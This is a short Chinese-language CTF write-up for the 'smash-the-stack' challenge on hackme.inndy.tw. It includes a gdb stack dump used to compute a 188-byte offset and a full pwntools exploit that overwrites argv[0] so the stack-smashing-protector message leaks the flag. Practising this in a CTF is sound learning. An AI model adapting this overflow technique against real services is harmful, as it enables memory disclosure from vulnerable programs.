一道典型的 Stack smash 的题目,用之前写过的 SSP leak(Stack Smashing Protector leak)直接做就行了
计算偏移
gef➤ telescope $esp 20
0xff858410│+0x00: 0x00000000 ← $esp
0xff858414│+0x04: 0xff858428 → 0x61616161
0xff858418│+0x08: 0x00010000
0xff85841c│+0x0c: 0x00000000
0xff858420│+0x10: 0x00000001
0xff858424│+0x14: 0xff8584e4 → 0xff85a163 → "smash-the-stack"
0xff858428│+0x18: 0x61616161 ← $ebx, $ecx
0xff85842c│+0x1c: 0x1bc60c0a
0xff858430│+0x20: 0xff858450 → 0x00000001
0xff858434│+0x24: 0x00000000
0xff858438│+0x28: 0x00000000 ← $ebp
0xff85843c│+0x2c: 0xf75ab637 → <__libc_start_main+247> add esp, 0x10
0xff858440│+0x30: 0xf7745000 → 0x001b1db0
0xff858444│+0x34: 0xf7745000 → 0x001b1db0
0xff858448│+0x38: 0x00000000
0xff85844c│+0x3c: 0xf75ab637 → <__libc_start_main+247> add esp, 0x10
0xff858450│+0x40: 0x00000001
0xff858454│+0x44: 0xff8584e4 → 0xff85a163 → "smash-the-stack"
0xff858458│+0x48: 0xff8584ec → 0xff85a173 → "INSTANCE="
0xff85845c│+0x4c: 0x00000000
gef➤ print &__libc_argv[0]
$2 = (char **) 0xff8584e4
>> 0xff8584e4 - 0xff858428
188
所以我们可以得到偏移为 188,填充 188 字节之后再接上我们想泄漏的 flag 的地址 0x0804A060
完整exp:
# Exploit script for the "smash-the-stack" challenge (Python 2 / pwntools).
# Mechanism, as set up by the gdb dump above: on a canary mismatch, the stack
# protector's failure handler in this libc (libc-2.23 per the commented-out
# LD_PRELOAD line) prints argv[0] in its
# "*** stack smashing detected ***: <argv[0]> terminated" message. The pointer
# to argv[0] sits 188 bytes past the overflowed buffer (0xff8584e4 - 0xff858428),
# so replacing it with the flag's address makes that message print the flag.
# Defender note: newer glibc releases no longer include argv[0] in this message,
# which removes this leak; the hard-coded 0x0804A060 also presumably depends on
# the binary not being PIE — confirm against the binary.
from pwn import *
#context.log_level = 'debug'
#p = process('smash-the-stack',env = {"LD_PRELOAD":"../libc-2.23.so.i386"})
p = remote('hackme.inndy.tw',7717)
#gdb.attach(p)
# Consume the prompt (ends with "flag\n") before sending input.
p.recvuntil('flag\n')
# 188 filler bytes reach &__libc_argv[0]; the next 4 bytes overwrite it with
# the address of the flag buffer.
payload = 'a'*188 + p32(0x0804A060)
p.sendline(payload)
# Skip the fixed prefix of the SSP failure message; what follows is argv[0].
p.recvuntil('detected ***: ')
# Read up to the closing brace of the flag.
flag = p.recvuntil('}')
# Python 2 print statement; use print(flag) on Python 3.
print flag
p.interactive()